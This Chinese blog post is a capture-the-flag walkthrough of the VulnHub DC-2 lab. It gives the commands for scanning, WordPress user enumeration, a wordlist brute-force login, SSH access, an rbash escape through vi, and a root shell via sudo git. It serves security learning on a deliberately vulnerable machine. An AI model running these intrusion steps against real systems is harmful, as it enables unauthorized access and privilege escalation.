【Try to Hack】vulnhub DC2

举报
开心星人 发表于 2022/06/29 15:15:22 2022/06/29
【摘要】 📒博客主页:开心星人的博客主页🔥系列专栏:Try to Hack🎉欢迎关注🔎点赞👍收藏⭐️留言📝📆首发时间:🌴2022年6月29日🌴🍭作者水平很有限,如果发现错误,还望告知,感谢!靶机知识点:1、hosts文件2、dirb扫目录3、wpscan枚举用户名4、cewl爬取密码5、ssh服务登录6、rbash逃逸7、git提权首先是桥接模式要注意的是这个靶场不是静态IP,那个...

📒博客主页:开心星人的博客主页
🔥系列专栏:Try to Hack
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年6月29日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

靶机知识点:
1、hosts文件
2、dirb扫目录
3、wpscan枚举用户名
4、cewl爬取密码
5、ssh服务登录
6、rbash逃逸
7、git提权

在这里插入图片描述
首先是桥接模式
要注意的是这个靶场不是静态IP,那个192.168.0.145只是个示例,告诉我们如何设置hosts文件的

照常下载靶机,它默认就是桥接模式了
在这里插入图片描述
不需要改动

kali攻击机也设置桥接模式(我是这样弄的)

netdiscover进行主机发现
因为靶机不是桥接模式,和我们的kali可能不在同一个网段
arp-scan -l也只能扫描和kali在同一网段的主机
在这里插入图片描述
这个是我们的靶机,因为VMare,Inc

端口扫描
namp -sV -p- 192.168.0.131
在这里插入图片描述

80端口开放,访问192.168.0.131
在这里插入图片描述

这样的结果

根据刚开始题目的描述,去设置一下hosts
vim /etc/hosts
在这里插入图片描述

在这里插入图片描述
访问成功
在这里插入图片描述
提示我们使用cewl
whatweb 192.168.0.131
在这里插入图片描述
是wordpress

dirb http://192.168.0.131
目录扫描
在这里插入图片描述
http://192.168.0.131/wp-admin/
可能是后台,访问一下
在这里插入图片描述
确实是,需要账号和密码
现在我们使用cewl吧
爬取网站内容,生成字典

cewl dc-2 > dc-2.txt
在这里插入图片描述
这是密码字典

我们使用wpscan获得用户名
wpscan --url http://dc-2 -e u

在这里插入图片描述
保存为user.txt
在这里插入图片描述

wpscan --url http://dc-2 --usernames user.txt --passwords dc-2.txt
用bp也可以
在这里插入图片描述
登录jerry,简单找一下
在这里插入图片描述
在这里插入图片描述
提示我们不能利用wordpress的漏洞

在这里插入图片描述
以为在这可以写shell的

用两个账号密码登录ssh

ssh -p 7744 tom@192.168.0.131
ssh -p 7744 jerry@192.168.0.131

在这里插入图片描述
登录进去了,也发现flag3了
但是读文件的命令被ban了

看下可以使用哪些命令

echo $PATH
echo /home/tom/usr/bin/*

在这里插入图片描述

vi flag3.txt
在这里插入图片描述
看到了flag
看wp明白,让我们用tom用户切换到jerry
需要使用su

在这里插入图片描述
rbash逃逸
rbash与一般shell的区别在于会限制一些行为,让一些命令无法执行。
【渗透测试】— rbash逃逸方法简述

在vi的:中可以将/bin/bash复制给shell
vi
输入:
:set shell=/bin/sh
再输入:
:shell
得到shell了

切换完成之后还要添加环境变量。给$PATH变量增加两个路径,用来查找命令
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

在这里插入图片描述
成功了
找一下flag
在这里插入图片描述
提示git
git提权

方法一
sudo git help config
!/bin/bash 或 !‘sh’

方法二
sudo git -p help
!/bin/bash

在这里插入图片描述

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。